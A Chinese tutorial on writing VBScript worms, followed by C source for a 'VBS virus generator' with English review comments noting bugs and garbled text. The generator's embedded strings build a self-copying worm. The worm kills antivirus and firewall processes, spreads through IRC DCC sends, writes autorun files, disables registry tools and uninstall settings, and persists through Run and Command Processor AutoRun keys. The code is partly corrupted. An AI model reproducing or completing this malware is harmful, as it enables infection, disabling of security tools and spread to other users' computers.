
教你写超级脚本病毒

5,有些windows的高级用户为了防范脚本病毒,把注册表中的filesystemobject项给删掉了,新的蠕虫将在执行的开始,
检查系统的filesystemobject项是否存在,如果不存在的话,将重新写入filesystemobject项,当然你也可以将其换个名称,这样有些
杀毒软件就不一定认识了,
On Error Resume Next
Set wa=CreateObject("WSc"+"ript.S"+"hell")
tt=wa.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools")
if tt=1 then
wa.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", 00000000, "REG_DWORD"
end if
uu=wa.RegRead("HKEY_CLASSES_ROOT\\CLSID\\{0D43FE01-F093-11CF-8940-00A0C9054228}")
if uu="" then
uu.RegWrite "HKEY_CLASSES_ROOT\\CLSID\\{0D43FE01-F093-11CF-8940-00A0C9054228}" , "FileSystemObject", "REG_SZ"
end if
或者
a.regdelete "HKEY_CLASSES_ROOT\\Scripting.FileSystemObject\\CLSID\\"
a.regdelete "HKEY_CLASSES_ROOT\\Scripting.FileSystemObject\\"
a.regwrite "HKEY_CLASSES_ROOT\\wangzhitong\\", "FileSystem Object", "REG_SZ"
a.regwrite "HKEY_CLASSES_ROOT\\wangzhitong\\CLSID\\", "{0D43FE01-F093-11CF-8940-00A0C9054228}", "REG_SZ"
set yu=createobject("wangzhitong")
以后系统内的filesystemobject项就被替换成了wangzhitong.

6,自己写好的蠕虫怎能让其他的蠕虫一起存在一个系统中呢,所以要劲可能的消灭其他的病毒程序:)
  当然你要先分析那些病毒程序,只要清除掉他们就行了。
附:   脚本病毒制造机
利用病毒制造机可以很轻松的制造出病毒来,比如库儿尼科娃的作者就是利用vbswg做出来的,小弟也用过很多种的脚本病毒制造机,
但用他们制造出的病毒,都是很低级的,还有人把用脚本该写注册表的程序就称之为病毒,而且写出个破烂程序来就大肆宣扬,晕3,
不知国内的大哥们究竟是怎么想的,记得vbswg2.0是用vb写的,而且是很早的时候了,高手是不愿写这些东西的,自己高考后也写过
一个脚本病毒制造机,一开始觉得很有成就感,可慢慢深入理解编程的实质时,就觉得那是个非常无聊的程序,下面给出这个程序的源代码,
高手不必看了,没做优化,菜鸟可以借鉴一下:



#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>
#define exit_success 0
#define again 1
#define m 4

int make();
int care();
void password(void);
void out(void);

main()
{
    /* Interactive text menu of the generator.  Declared without a return
     * type (implicit int) -- accepted by pre-C99 compilers only.  Relies on
     * clrscr()/getch() from <conio.h>, so the listing is DOS/Windows-only.
     * `again` is the macro constant 1 (see the #define above), so the loop
     * only ends through `return 0` (case 1) or exit() (case 3). */
    char choose;
    clrscr();
    printf("*******************************************************************************\\n");
    printf("This is a VBS virus made machine,it\''s only used to study,don\''t used to destory.\\n");
    printf("                             Programmed by W.Z.T\\n");
    printf("                                 Version 0.1\\n");
    printf("*******************************************************************************\\n");
    puts("\\n\\t1--Strat Make\\t\\t2--View Help\\t\\t3--Exit");
    /* NOTE(review): the "\\n" / "\\t" / "\''" sequences throughout this
     * listing look like "\n", "\t" and "'" double-escaped by whatever
     * extracted this page -- confirm against the original before compiling. */
    while(again)
    {
printf("choice:");
scanf("%c",&choose);   /* reads exactly one byte and its result is not checked:
                          the '\n' from the Enter key is left in the input and
                          is consumed by the next pass, landing in `default`,
                          so every selection also prints the "choice 1,2 or 3"
                          hint; on EOF `choose` stays uninitialized (UB) and
                          the loop spins forever */
tch(choose)            /* NOTE(review): presumably `switch(choose)` with its
                          first letters lost in extraction -- confirm */
{
      case\''1\'':      /* NOTE(review): `case '1':` garbled the same way */
      {
    make();            /* the generator itself; defined further down */
    clrscr();
    return 0;
      }
      case\''2\'':
      {
    clrscr();
    puts("I like Virus,so i write a machine which anybody can make a Virus much easiler.\\n");
    puts("This Version is my first one,i will try to write a better one later.\\n");
    out();             /* out() re-enters main() recursively; if that nested
                          call ever returns, there is no `break` here, so
                          control falls through into case '3' and exits */
      }
      case\''3\'':
      {
    exit(exit_success);
      }
      default:
      {
    puts("choice 1,2 or 3");
      }
}
    }
}

void out(void)
{
    /* "Press any key" pause shown after the help screen.  Prints the literal
     * word "pause" (this is printf, not system("pause")), waits for one key
     * via the <conio.h> getch(), then calls main() again instead of returning
     * to the caller's loop -- each help view nests another menu frame on the
     * stack, which is only unwound when the process exits. */
    printf("\\npause");
    getch();
    main();
}

void password(void)
{
    /* Masked password prompt: reads keystrokes with getch(), echoes one '*'
     * per character, handles Backspace (8) and Enter (13), and compares the
     * result with the hard-coded `pass`.  The outcome is only printed
     * ("done." / "password error."), never returned, so a caller cannot act
     * on it.  Nothing visible in this listing calls it. */
    int i,j,y=0;                         /* `i` is unused; `y` mirrors `j`
                                            exactly (both change together) */
    char pwd[11+1],pass[]="wangzhitong"; /* pass is 11 chars; pwd holds 11
                                            chars + NUL.  A credential stored
                                            as a plain string in the binary is
                                            readable straight out of the
                                            executable, so this gates nothing */
    fflush(stdin);                       /* undefined behaviour in ISO C; on
                                            the DOS/Windows CRTs of the time
                                            this presumably discarded pending
                                            input -- confirm */
    printf("If you want to use this function,please input the password.\\n");
    for(j=0;;)
    {
       if((pwd[j]=getch())==13)          /* Enter terminates the input */
       {
   pwd[j]=\''\\0\'';                       /* NOTE(review): `'\0'` garbled by
                                            extraction -- confirm */
   break;
       }
       else if(pwd[j]==8)                /* Backspace: step back only if
                                            something was typed ... */
       {
   if(y!=0)
   {
      printf("\\b");
      y--;
      j--;
   }
   putchar(0);                          /* ... but a NUL byte and '\b' are
                                            still written at position 0 */
   printf("\\b");
       }
       else if(j==11)                    /* buffer full: the key was stored in
                                            pwd[11] (the NUL slot) and is then
                                            ignored; Enter later overwrites
                                            that slot with the terminator */
    continue;
       else
       {
    printf("*");
    y++;
    j++;
       }
   }
   if(strcmp(pwd,pass)==0)
   {
       printf("\\ndone.\\n");
   }
   else
   {
       printf("password error.\\n");     /* no leading newline: printed on the
                                            same line as the asterisks */
   }
}

int make()
{
    FILE *fp,*fp1;
    int i,j,aa,bb,cc,dd,ee,ff,gg,hh,jjj,kkk,lll,y=0,word=0,number=0;
    char ch,w[5],*vc=w;
    char subject[200],*sub=subject;
    char body[400],*bo=body;
    char string[100],*pop=string;
    char road[100],name2[40],road2[100],time[20],web[100];
    char pwd[11+1],pass[]="wangzhitong";
    char *ext1[27]={"txt","vbs","vbe","html","htm","bak","dll","pfg","ppl","c","bin","sig","vdb","dat","doc","xls","tsk","tmp","vdb","vlg","dsc","ptn","set","log","cfg","idx","rec"};
    char **pl=ext1;
    char str1[25][100]={"(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\""};
    char str2[]="\\") or";
    char *str[27],**pa=str;
    char *a="\\non error resume next\\nset fso=createobject(\\"scripting.filesystemobject\\")\\nset a=createobject(\\"wscript.shell\\")\\nset dir1=fso.getspecialfolder(0)\\nset dir2=fso.getspecialfolder(1)\\nset k=fso.getfile(wscript.scriptfullname)\\n";
    char *b="k.copy(dir2&\\"\\\\system.vbe\\")\\n";
    char *c="k.copy(dir1&\\"\\\\windows.vbe\\")\\n";
    char *d="set ag=fso.createtextfile(dir1&\\"\\kill.vbe\\")\\nag.writeline \\"on error resume next\\"\\nag.writeline \\"do\\"\\nag.writeline \\"strComputer=\\"\\".\\"\\"\\"\\n";
    char *e="ag.writeline \\"set objWMIService=GetObject(\\"\\"winmgmts:\\"\\" & \\"\\"{impersonationLevel=impersonate}!\\\\\\\\\\"\\" & strComputer & \\"\\"\\\\root\\\\cimv2\\"\\")\\"\\n";
    char *f="ag.writeline \\"fv=Array(\\"\\"notepad.exe\\"\\",\\"\\"pccguide.exe\\"\\",\\"\\"pccclient.exe\\"\\",\\"\\"rfw.exe\\"\\",\\"\\"davpfw.exe\\"\\",\\"\\"vpc32.exe\\"\\",\\"\\"ravmon.exe\\"\\")\\"\\n";
    char *g="ag.writeline \\"for Each fa in fv\\"\\nag.writeline \\"Set colProcessList=objWMIService.ExecQuery (\\"\\"Select * from Win32_Process Where Name=\\\''\\"\\"&fa&\\"\\"\\\''\\"\\")\\"\\nag.writeline \\"For Each objProcess in colProcessList\\"\\n";
    char *h="ag.writeline \\"objProcess.Terminate()\\"\\nag.writeline \\"Next\\"\\nag.writeline \\"next\\"\\nag.writeline \\"loop\\"\\nag.close\\na.run fso.getspecialfolder(0) & \\"\\\\kill.vbe\\"\\nset ai=fso.getfile(dir1&\\"\\\\kill.vbe\\")\\n";
    char *ii="ai.attributes=ai.attributes+2\\n";
    char *jj="set cc=fso.createtextfile(dir1&\\"\\\\Run.bat\\")\\ncc.writeline \\"@echo off\\"\\ncc.writeline \\"cls\\"\\ncc.writeline \\"echo              %date% %time%\\"\\ncc.writeline \\"echo    Chinese hacker is the best!\\"\\n";
    char *k="cc.writeline \\"prompt $P$G$$$_*tthacker@eyou.com*\\"\\ncc.writeline \\"echo on\\"\\ncc.close\\nset at=fso.getfile(dir1&\\"\\\\Run.bat\\")\\nat.attributes=at.attributes+2\\n";
    char *l="set sii=fso.createtextfile(dir2&\\"\\\\event.ini\\")\\nsii.writeline \\"[Levels]\\"\\nsii.writeline \\"Enabled=1\\"\\nsii.writeline \\"Count=6\\"\\nsii.writeline \\"Level1=000-Unknowns\\"\\nsii.writeline \\"000-UnknownsEnabled=1\\"\\n";
    char *mm="sii.writeline \\"Level2=100-Level 100\\"\\nsii.writeline \\"100-Level 100Enabled=1\\"\\nsii.writeline \\"Level3=200-Level 200\\"\\nsii.writeline \\"200-Level 200Enabled=1\\"\\n";
    char *nn="sii.writeline \\"Level4=300-Level 300\\"\\nsii.writeline \\"300-Level 300Enabled=1\\"\\nsii.writeline \\"Level5=400-Level 400\\"\\nsii.writeline \\"400-Level 400Enabled=1\\"\\n";
    char *oo="sii.writeline \\"Level6=500-Level 500\\"\\nsii.writeline \\"500-Level 500Enabled=1\\"\\nsii.writeline \\"\\"\\n";
    char *pp="sii.writeline \\"[000-Unknowns]\\"\\nsii.writeline \\"UserCount=0\\"\\nsii.writeline \\"EventCount=0\\"\\nsii.writeline \\"\\"\\n";
    char *qq="sii.writeline \\"[100-Level 100]\\"\\nsii.writeline \\"User1=*!*@*\\"\\nsii.writeline \\"UserCount=1\\"\\nsii.writeline \\"Event1=ON JOIN:#:/dcc tsend $nick \\" & fso.getspecialfolder(1) & \\"\\\\system.vbe\\"\\nsii.writeline \\"EventCount=1\\"\\n";
    char *rr="sii.writeline \\"\\"\\nsii.writeline \\"[200-Level 200]\\"\\nsii.writeline \\"UserCount=0\\"\\nsii.writeline \\"EventCount=0\\"\\nsii.writeline \\"\\"\\n";
    char *ss="sii.writeline \\"[300-Level 300]\\"\\nsii.writeline \\"UserCount=0\\"\\nsii.writeline \\"EventCount=0\\"\\nsii.writeline \\"\\"\\nsii.writeline \\"[400-Level 400]\\"\\nsii.writeline \\"UserCount=0\\"\\nsii.writeline \\"EventCount=0\\"\\n";
    char *tt="sii.writeline \\"\\"\\nsii.writeline \\"[500-Level 500]\\"\\nsii.writeline \\"UserCount=0\\"\\nsii.writeline \\"EventCount=0\\"\\nsii.close\\nset wi=fso.getfile(dir2&\\"\\\\event.ini\\")\\nwi.attributes=attributes+2\\n";
    char *uu="set rei=fso.createtextfile(dir1&\\"\\\\check.vbe\\")\\nrei.writeline \\"on error resume next\\"\\nrei.writeline \\"dim bb,aa,cc\\"\\nrei.writeline \\"set cc=createobject(\\"\\"wscript.shell\\"\\")\\"\\n";
    char *vv="rei.writeline \\"aa=minute(time)\\"\\nrei.writeline \\"bb=aa\\"\\nrei.writeline \\"do\\"\\nwei.writeline \\"bb=minute(time)\\"\\nrei.writeline \\"loop until aa>=bb+1\\"\\nrei.writeline \\"cc.run \\"\\"system.vbe\\"\\"\\"\\nrei.close\\n";
    char *ww="a.run \\"check.vbe\\"\\nset ahd=fso.getfile(dir1&\\"\\\\check.vbe\\")\\nahd.attributes=attributes+2\\nset ah=fso.getfile(dir2&\\"\\wscript.exe\\")\\nah.attributes=attritutes+2\\n";
    char *xx="set bh=fso.getfile(dir2&\\"\\\\cscript.exe\\")\\nbh.attributes=attributes+2\\nset apq=fso.createtextfile(dir2&\\"\\system.inf\\")\\napq.writeline \\"[Autorun]\\"\\napq.writeline \\"open=system.vbs\\"\\napq.close\\n";
    char *yy="set pr=fso.getfile(dir2&\\"\\\\system.inf\\")\\npr.attributes=attributes+2\\nkill()\\nregruns()\\nlistadriv()\\njuyu()\\nmail()\\n";
    char *kill1="sub kill()\\nset fso=createobject(\\"scripting.filesystemobject\\")\\nset aa=createobject(\\"wscript.shell\\")\\nbb = \\"";
    char *kill2="vv = they(bb)\\nset tt=fso.createtextfile(fso.getspecialfolder(0) & \\"\\\\rav.exe\\",true)\\ntt.write vv\\ntt.close\\naa.run fso.getspecialfolder(0) & \\"\\\\rav.exe\\",1,false\\ntehy(our)\\nend sub\\n";
    char *kill3="Function they(our)\\nFor mine=1 To Len(our) Step 2\\nthey = they & Chr(\\"&h\\" & Mid(our,mine, 2))\\nNext\\nEnd Function\\n";
    char *reg1="sub regruns()\\non error resume next\\nset a=createobject(\\"wscript.shell\\")\\nkj=\\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\\\"\\nki=\\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\\\"\\n";
    char *reg2="a.regwrite kj&\\"Internet Settings\\\\NoNetAutodial\\",01,\\"REG_BINARY\\"\\na.run \\"RUNDLL32.exe shell32,dll,SHExitWindowsEx2\\"\\na.run \\"ping -1 6500 -t ";
    char *reg3="a.regwrite kj&\\"Policies\\\\System\\\\DisableRegistryTools\\",\\"00000001\\",\\"REG_DWORD\\"\\n";
    char *reg4="a.regwrite kj&\\"Policies\\\\Explorer\\\\NoFolderOptions\\",\\"00000001\\",\\"REG_DWORD\\"\\n";
    char *reg5="a.regwrite kj&\\"Policies\\\\Uninstall\\\\NoAddFromCDorFloppy\\"\\"00000001\\",\\"DWORD\\"\\n";
    char *reg6="a.regwrite kj&\\"Policies\\\\Uninstall\\NoAddRemovePrograms\\",\\"00000001\\",\\"REG_DWORD\\"\\n";
    char *reg7="a.regwrite kj&\\"Policies\\\\Uninstall\\NoAddRemovePage\\",\\"00000001\\",\\"REG_DWORD\\"\\n";
    char *reg8="a.regwrite kj&\\"Policies\\\\Explorer\\\\Advanced\\\\folder\\\\Hidden\\\\SHOWALL\\\\checkedValue\\",\\"00000001\\",\\"REG_DWORD\\"\\n";
    char *reg9="a.regwrite \\"HKLM\\\\Software\\\\CLASSES\\\\.reg\\",\\"txtfile\\"\\n";
    char *reg10="a.regwrite \\"HKLM\\\\Software\\\\Microsoft\\\\Command Processor\\\\AutoRun\\",\\"%systemroot%\\\\run.bat&system32.vbe\\",\\"REG_SZ\\"\\n";
    char *reg11="a.retwrite \\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\system\\",dir1&\\"\\\\windows.vbe\\"\\nend sub\\n";
